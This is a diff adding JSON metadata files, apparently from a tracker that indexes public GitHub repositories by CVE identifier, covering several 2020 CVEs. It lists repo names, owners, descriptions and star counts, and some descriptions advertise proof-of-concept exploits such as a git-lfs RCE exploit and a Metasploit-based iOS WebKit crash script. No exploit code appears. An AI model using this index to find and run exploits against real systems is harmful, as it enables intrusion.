\ No newline at end of file diff --git a/2020/CVE-2020-27368.json b/2020/CVE-2020-27368.json new file mode 100644 index 0000000000..a336c8c9a5 --- /dev/null +++ b/2020/CVE-2020-27368.json @@ -0,0 +1,33 @@ +[ + { + "id": 598663906, + "name": "CVE-2020-27368", + "full_name": "swzhouu\/CVE-2020-27368", + "owner": { + "login": "swzhouu", + "id": 74352439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74352439?v=4", + "html_url": "https:\/\/github.com\/swzhouu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swzhouu\/CVE-2020-27368", + "description": "TOTOLINK-A702R-V1.0.0-B20161227.1023 Directory Indexing Vulnerability", + "fork": false, + "created_at": "2023-02-07T15:12:27Z", + "updated_at": "2023-02-07T15:13:07Z", + "pushed_at": "2023-02-07T15:12:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27603.json b/2020/CVE-2020-27603.json new file mode 100644 index 0000000000..17a85f6c9d --- /dev/null +++ b/2020/CVE-2020-27603.json @@ -0,0 +1,33 @@ +[ + { + "id": 311776413, + "name": "CVE-2020-27603-bbb-libreoffice-poc", + "full_name": "hannob\/CVE-2020-27603-bbb-libreoffice-poc", + "owner": { + "login": "hannob", + "id": 990588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/990588?v=4", + "html_url": "https:\/\/github.com\/hannob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hannob\/CVE-2020-27603-bbb-libreoffice-poc", + "description": "Proof of Concept of Libreoffice file exfiltration vulnerability in Big Blue Button", + "fork": false, + "created_at": "2020-11-10T20:26:44Z", + "updated_at": "2021-10-28T10:20:23Z", + "pushed_at": "2020-11-10T20:28:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27688.json b/2020/CVE-2020-27688.json new file mode 100644 index 0000000000..342fb73235 --- /dev/null +++ b/2020/CVE-2020-27688.json @@ -0,0 +1,37 @@ +[ + { + "id": 306543426, + "name": "CVE-2020-27688", + "full_name": "matthiasmaes\/CVE-2020-27688", + "owner": { + "login": "matthiasmaes", + "id": 13682386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13682386?v=4", + "html_url": "https:\/\/github.com\/matthiasmaes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matthiasmaes\/CVE-2020-27688", + "description": "CVE-2020-27688", + "fork": false, + "created_at": "2020-10-23T06:02:28Z", + "updated_at": "2024-01-10T13:57:17Z", + "pushed_at": "2021-06-07T07:13:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "encryption", + "extract", + "rvtools" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27747.json b/2020/CVE-2020-27747.json new file mode 100644 index 0000000000..fcf30d52f5 --- /dev/null +++ b/2020/CVE-2020-27747.json @@ -0,0 +1,33 @@ +[ + { + "id": 308272718, + "name": "CVE-2020-27747", + "full_name": "jet-pentest\/CVE-2020-27747", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-27747", + "description": "Possible Account Takeover | Brute Force Ability", + "fork": false, + "created_at": "2020-10-29T09:06:24Z", + "updated_at": "2021-02-14T09:24:22Z", + "pushed_at": "2020-10-29T09:23:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27786.json b/2020/CVE-2020-27786.json new file mode 100644 index 0000000000..7969157bfb --- /dev/null +++ b/2020/CVE-2020-27786.json @@ -0,0 +1,157 @@ +[ + { + "id": 502862566, + "name": "CVE-2020-27786-Kernel-Exploit", + "full_name": "kiks7\/CVE-2020-27786-Kernel-Exploit", + "owner": { + "login": "kiks7", + "id": 41572858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41572858?v=4", + "html_url": "https:\/\/github.com\/kiks7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiks7\/CVE-2020-27786-Kernel-Exploit", + "description": "4.9 Kernel Exploit for CVE-2020-27786", + "fork": false, + "created_at": "2022-06-13T08:04:19Z", + "updated_at": "2024-08-12T20:24:06Z", + "pushed_at": "2022-12-03T06:46:11Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 633188683, + "name": "CVE-2020-27786", + "full_name": "elbiazo\/CVE-2020-27786", + "owner": { + "login": "elbiazo", + "id": 23147879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23147879?v=4", + "html_url": "https:\/\/github.com\/elbiazo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elbiazo\/CVE-2020-27786", + "description": null, + "fork": false, + "created_at": "2023-04-27T01:13:04Z", + "updated_at": "2023-04-27T01:18:19Z", + "pushed_at": "2023-04-27T01:18:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 651017415, + "name": "linux-4.19.72_CVE-2020-27786", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2020-27786", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2020-27786", + "description": null, + "fork": false, + "created_at": "2023-06-08T10:01:33Z", + "updated_at": "2023-06-08T10:07:26Z", + "pushed_at": "2023-06-08T10:04:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787421344, + "name": "CVE-2020-27786", + "full_name": "ii4gsp\/CVE-2020-27786", + "owner": { + "login": "ii4gsp", + "id": 150011478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150011478?v=4", + "html_url": "https:\/\/github.com\/ii4gsp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ii4gsp\/CVE-2020-27786", + "description": null, + "fork": false, + "created_at": "2024-04-16T13:45:35Z", + "updated_at": "2024-09-10T22:24:48Z", + "pushed_at": "2024-04-17T04:44:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891870719, + "name": "CVE-2020-27786", + "full_name": "enlist12\/CVE-2020-27786", + "owner": { + "login": "enlist12", + "id": 126598825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126598825?v=4", + "html_url": "https:\/\/github.com\/enlist12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enlist12\/CVE-2020-27786", + "description": null, + "fork": false, + "created_at": "2024-11-21T05:17:54Z", + "updated_at": "2024-11-21T05:19:17Z", + "pushed_at": "2024-11-21T05:19:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27815.json b/2020/CVE-2020-27815.json new file mode 100644 index 0000000000..1d0465ec1e --- /dev/null +++ b/2020/CVE-2020-27815.json @@ -0,0 +1,33 @@ +[ + { + "id": 673355445, + "name": "linux-4.19.72_CVE-2020-27815", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2020-27815", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2020-27815", + "description": null, + "fork": false, + "created_at": "2023-08-01T12:50:41Z", + "updated_at": "2023-08-01T12:56:55Z", + "pushed_at": "2023-08-01T12:54:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27824.json b/2020/CVE-2020-27824.json new file mode 100644 index 0000000000..f17df7732b --- /dev/null +++ b/2020/CVE-2020-27824.json @@ -0,0 +1,33 @@ +[ + { + "id": 483206761, + "name": "openjpeg-2.3.0_CVE-2020-27824", + "full_name": "pazhanivel07\/openjpeg-2.3.0_CVE-2020-27824", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/openjpeg-2.3.0_CVE-2020-27824", + "description": null, + "fork": false, + "created_at": "2022-04-19T10:53:52Z", + "updated_at": "2023-04-11T01:17:59Z", + "pushed_at": "2022-04-19T10:56:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27838.json b/2020/CVE-2020-27838.json new file mode 100644 index 0000000000..4789c4a7a5 --- /dev/null +++ b/2020/CVE-2020-27838.json @@ -0,0 +1,41 @@ +[ + { + "id": 800580605, + "name": "CVE-2020-27838", + "full_name": "Cappricio-Securities\/CVE-2020-27838", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2020-27838", + "description": "CVE-2020-27838 - KeyCloak - Information Exposure ", + "fork": false, + "created_at": "2024-05-14T15:50:16Z", + "updated_at": "2024-06-24T07:16:08Z", + "pushed_at": "2024-06-24T07:13:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-27838", + "keycloak", + "pentesting", + "sso-authentication", + "vapt", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27904.json b/2020/CVE-2020-27904.json new file mode 100644 index 0000000000..07ba5ba2ca --- /dev/null +++ b/2020/CVE-2020-27904.json @@ -0,0 +1,33 @@ +[ + { + "id": 353295215, + "name": "xattr-oob-swap", + "full_name": "pattern-f\/xattr-oob-swap", + "owner": { + "login": "pattern-f", + "id": 48882723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48882723?v=4", + "html_url": "https:\/\/github.com\/pattern-f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pattern-f\/xattr-oob-swap", + "description": "Demo exploit code for CVE-2020-27904, a tfp0 bug.", + "fork": false, + "created_at": "2021-03-31T09:11:29Z", + "updated_at": "2024-08-12T20:11:42Z", + "pushed_at": "2021-04-29T07:14:33Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 65, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27930.json b/2020/CVE-2020-27930.json new file mode 100644 index 0000000000..4031db9df1 --- /dev/null +++ b/2020/CVE-2020-27930.json @@ -0,0 +1,33 @@ +[ + { + "id": 336769736, + "name": "Apple-Safari-Remote-Code-Execution-CVE-2020-27930", + "full_name": "FunPhishing\/Apple-Safari-Remote-Code-Execution-CVE-2020-27930", + "owner": { + "login": "FunPhishing", + "id": 77312720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77312720?v=4", + "html_url": "https:\/\/github.com\/FunPhishing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FunPhishing\/Apple-Safari-Remote-Code-Execution-CVE-2020-27930", + "description": "Apple Safari Remote Code Execution", + "fork": false, + "created_at": "2021-02-07T11:28:21Z", + "updated_at": "2021-02-07T11:30:11Z", + "pushed_at": "2021-02-07T11:30:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27935.json b/2020/CVE-2020-27935.json new file mode 100644 index 0000000000..b4fd5cb962 --- /dev/null +++ b/2020/CVE-2020-27935.json @@ -0,0 +1,33 @@ +[ + { + "id": 322620609, + "name": "SnatchBox", + "full_name": "LIJI32\/SnatchBox", + "owner": { + "login": "LIJI32", + "id": 2345928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2345928?v=4", + "html_url": "https:\/\/github.com\/LIJI32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LIJI32\/SnatchBox", + "description": "SnatchBox (CVE-2020-27935) is a sandbox escape vulnerability and exploit affecting macOS up to version 10.15.x", + "fork": false, + "created_at": "2020-12-18T14:39:28Z", + "updated_at": "2024-08-12T20:08:37Z", + "pushed_at": "2020-12-18T14:41:09Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27949.json b/2020/CVE-2020-27949.json new file mode 100644 index 0000000000..e36edb0674 --- /dev/null +++ b/2020/CVE-2020-27949.json @@ -0,0 +1,33 @@ +[ + { + "id": 321454015, + "name": "dtrace-memaccess_cve-2020-27949", + "full_name": "seemoo-lab\/dtrace-memaccess_cve-2020-27949", + "owner": { + "login": "seemoo-lab", + "id": 7370084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7370084?v=4", + "html_url": "https:\/\/github.com\/seemoo-lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seemoo-lab\/dtrace-memaccess_cve-2020-27949", + "description": null, + "fork": false, + "created_at": "2020-12-14T19:39:42Z", + "updated_at": "2024-04-30T12:28:49Z", + "pushed_at": "2020-12-20T17:29:07Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 35, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27950.json b/2020/CVE-2020-27950.json new file mode 100644 index 0000000000..9f1a9232a5 --- /dev/null +++ b/2020/CVE-2020-27950.json @@ -0,0 +1,64 @@ +[ + { + "id": 317590228, + "name": "CVE-2020-27950", + "full_name": "synacktiv\/CVE-2020-27950", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2020-27950", + "description": "CVE-2020-27950 exploit", + "fork": false, + "created_at": "2020-12-01T15:49:07Z", + "updated_at": "2024-09-25T12:27:29Z", + "pushed_at": "2020-12-01T15:50:45Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 31, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 857806320, + "name": "browser-crash-tool", + "full_name": "lyonzon2\/browser-crash-tool", + "owner": { + "login": "lyonzon2", + "id": 67530243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67530243?v=4", + "html_url": "https:\/\/github.com\/lyonzon2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lyonzon2\/browser-crash-tool", + "description": "A Bash script for Kali Linux that exploits an iOS WebKit vulnerability (CVE-2020-27950) using Metasploit and ngrok. Automates payload delivery with a public URL via ngrok, checks for required tools, handles errors, and provides an easy way to crash browsers for educational purposes only.", + "fork": false, + "created_at": "2024-09-15T16:54:03Z", + "updated_at": "2024-11-25T03:48:38Z", + "pushed_at": "2024-11-15T03:41:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27955.json b/2020/CVE-2020-27955.json new file mode 100644 index 0000000000..5906e50142 --- /dev/null +++ b/2020/CVE-2020-27955.json @@ -0,0 +1,560 @@ +[ + { + "id": 309756250, + "name": "git-lfs-RCE-exploit-CVE-2020-27955", + "full_name": "ExploitBox\/git-lfs-RCE-exploit-CVE-2020-27955", + "owner": { + "login": "ExploitBox", + "id": 26202735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26202735?v=4", + "html_url": "https:\/\/github.com\/ExploitBox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ExploitBox\/git-lfs-RCE-exploit-CVE-2020-27955", + "description": "Git-lfs RCE exploit CVE-2020-27955 - tested on Windows on: git, gh cli, GitHub Desktop, Visual Studio, SourceTree etc.", + "fork": false, + "created_at": "2020-11-03T17:14:22Z", + "updated_at": "2024-08-12T20:07:20Z", + "pushed_at": "2021-01-12T10:11:42Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 310061053, + "name": "git-lfs-RCE-exploit-CVE-2020-27955-Go", + "full_name": "ExploitBox\/git-lfs-RCE-exploit-CVE-2020-27955-Go", + "owner": { + "login": "ExploitBox", + "id": 26202735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26202735?v=4", + "html_url": "https:\/\/github.com\/ExploitBox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ExploitBox\/git-lfs-RCE-exploit-CVE-2020-27955-Go", + "description": null, + "fork": false, + "created_at": "2020-11-04T16:43:04Z", + "updated_at": "2024-11-16T19:54:18Z", + "pushed_at": "2020-11-04T19:09:31Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 314947753, + "name": "cve-2020-27955-poc", + "full_name": "yhsung\/cve-2020-27955-poc", + "owner": { + "login": "yhsung", + "id": 1084269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1084269?v=4", + "html_url": "https:\/\/github.com\/yhsung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yhsung\/cve-2020-27955-poc", + "description": null, + "fork": false, + "created_at": "2020-11-22T02:59:46Z", + "updated_at": "2020-11-22T03:04:29Z", + "pushed_at": "2020-11-22T03:04:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 315498736, + "name": "CVE-2020-27955", + "full_name": "r00t4dm\/CVE-2020-27955", + "owner": { + "login": "r00t4dm", + "id": 36941976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36941976?v=4", + "html_url": "https:\/\/github.com\/r00t4dm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00t4dm\/CVE-2020-27955", + "description": null, + "fork": false, + "created_at": "2020-11-24T02:40:04Z", + "updated_at": "2023-01-05T13:59:54Z", + "pushed_at": "2020-11-24T02:59:34Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 322199299, + "name": "CVE-2020-27955", + "full_name": "shubham0d\/CVE-2020-27955", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/CVE-2020-27955", + "description": "POC for CVE-2020-27955", + "fork": false, + "created_at": "2020-12-17T06:14:30Z", + "updated_at": "2020-12-17T06:14:30Z", + "pushed_at": "2020-12-17T06:14:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325019967, + "name": "cve-2020-27955", + "full_name": "TheTh1nk3r\/cve-2020-27955", + "owner": { + "login": "TheTh1nk3r", + "id": 42456962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42456962?v=4", + "html_url": "https:\/\/github.com\/TheTh1nk3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheTh1nk3r\/cve-2020-27955", + "description": "cve-2020-27955", + "fork": false, + "created_at": "2020-12-28T13:27:27Z", + "updated_at": "2021-03-05T08:15:45Z", + "pushed_at": "2020-12-29T05:32:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 352905168, + "name": "CVE-2020-27955", + "full_name": "NeoDarwin\/CVE-2020-27955", + "owner": { + "login": "NeoDarwin", + "id": 35026625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35026625?v=4", + "html_url": "https:\/\/github.com\/NeoDarwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeoDarwin\/CVE-2020-27955", + "description": "CVE-2020-27955 Poc", + "fork": false, + "created_at": "2021-03-30T07:12:11Z", + "updated_at": "2021-03-30T07:19:13Z", + "pushed_at": "2021-03-30T07:19:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 363093968, + "name": "CVE-2020-27955-LFS", + "full_name": "DeeLMind\/CVE-2020-27955-LFS", + "owner": { + "login": "DeeLMind", + "id": 18142084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18142084?v=4", + "html_url": "https:\/\/github.com\/DeeLMind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DeeLMind\/CVE-2020-27955-LFS", + "description": null, + "fork": false, + "created_at": "2021-04-30T09:38:48Z", + "updated_at": "2024-09-25T04:00:37Z", + "pushed_at": "2021-04-30T09:43:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 363165166, + "name": "CVE-2020-27955", + "full_name": "HK69s\/CVE-2020-27955", + "owner": { + "login": "HK69s", + "id": 61073603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61073603?v=4", + "html_url": "https:\/\/github.com\/HK69s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HK69s\/CVE-2020-27955", + "description": "CVE-2020-27955", + "fork": false, + "created_at": "2021-04-30T14:25:42Z", + "updated_at": "2021-04-30T14:29:08Z", + "pushed_at": "2021-04-30T14:29:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 364796273, + "name": "CVE-2020-27955", + "full_name": "IanSmith123\/CVE-2020-27955", + "owner": { + "login": "IanSmith123", + "id": 19611084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19611084?v=4", + "html_url": "https:\/\/github.com\/IanSmith123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IanSmith123\/CVE-2020-27955", + "description": null, + "fork": false, + "created_at": "2021-05-06T05:36:05Z", + "updated_at": "2021-05-06T05:39:20Z", + "pushed_at": "2021-05-06T05:39:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 367014200, + "name": "CVE-2020-27955", + "full_name": "Arnoldqqq\/CVE-2020-27955", + "owner": { + "login": "Arnoldqqq", + "id": 62465887, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62465887?v=4", + "html_url": "https:\/\/github.com\/Arnoldqqq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arnoldqqq\/CVE-2020-27955", + "description": null, + "fork": false, + "created_at": "2021-05-13T10:30:28Z", + "updated_at": "2021-05-13T10:33:03Z", + "pushed_at": "2021-05-13T10:33:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 369939082, + "name": "CVE-2020-27955", + "full_name": "nob0dy-3389\/CVE-2020-27955", + "owner": { + "login": "nob0dy-3389", + "id": 84649589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84649589?v=4", + "html_url": "https:\/\/github.com\/nob0dy-3389", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nob0dy-3389\/CVE-2020-27955", + "description": null, + "fork": false, + "created_at": "2021-05-23T01:40:11Z", + "updated_at": "2021-05-23T01:42:59Z", + "pushed_at": "2021-05-23T01:42:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 370741007, + "name": "CVE-2020-27955-LFS", + "full_name": "Marsable\/CVE-2020-27955-LFS", + "owner": { + "login": "Marsable", + "id": 43372011, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43372011?v=4", + "html_url": "https:\/\/github.com\/Marsable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marsable\/CVE-2020-27955-LFS", + "description": null, + "fork": false, + "created_at": "2021-05-25T15:26:35Z", + "updated_at": "2021-05-25T15:28:08Z", + "pushed_at": "2021-05-25T15:28:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 